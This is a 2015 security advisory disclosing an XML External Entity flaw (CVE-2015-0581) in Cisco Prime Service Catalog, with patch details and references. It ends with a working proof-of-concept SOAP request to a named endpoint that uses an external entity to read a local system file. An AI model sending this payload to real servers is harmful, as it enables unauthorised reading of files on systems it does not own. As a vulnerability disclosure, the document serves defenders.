Advisory February 9, 2015

Obrela Security Industries Advisory (OSI-1501)

Advisory ID 

OSI-1501

Description:

The XML parser of Cisco Prime Service Catalog suffers from a vulnerability that could allow an authenticated remote attacker to either cause denial of service conditions (resources consumption) or retrieve sensitive data (local data access).

Researcher:

Alexis Dimitriadis (a.dimitriadis[a t]obrela[do t]com)

Vulnerability:

CVE-2015-0581: Cisco Prime Service Catalog XML External Entity Processing Vulnerability
CVSS Base Score: 7.0, CVSS Temporal Score: 5.8

Identification date:

09/06/2014

Solution – fix & patch:

Cisco has released Prime Service Catalog 10.1 as well as a patch for 9.4.1, 9.4.1R2, 10.0, and 10.0R2 to remediate this vulnerability.

References:

Mitre entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0581

Cisco advisory: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-psc-xmlee

PoC:

The following information represents a PoC aiming to access the ‘boot.ini’ local file of the host lying underneath; note that directories can also be listed.

Url:

/RequestCenter/services/ServiceManagerTaskService

Post data:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY varname SYSTEM "file:///C:/boot.ini">]>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  xmlns:req="http://smtask.api.newscale.com">

<soapenv:Header><req:AuthenticationToken>

<req:Username>username&varname;</req:Username><req:Password>password</req:Password>

</req:AuthenticationToken></soapenv:Header>

<soapenv:Body><req:getAuthorizationsForUser>

<req:userLoginName>username</req:userLoginName><req:startRow>0</req:startRow>

<req:numberOfRows>9999</req:numberOfRows><req:status>1</req:status>

<req:viewType>2</req:viewType>

</req:getAuthorizationsForUser></soapenv:Body></soapenv:Envelope>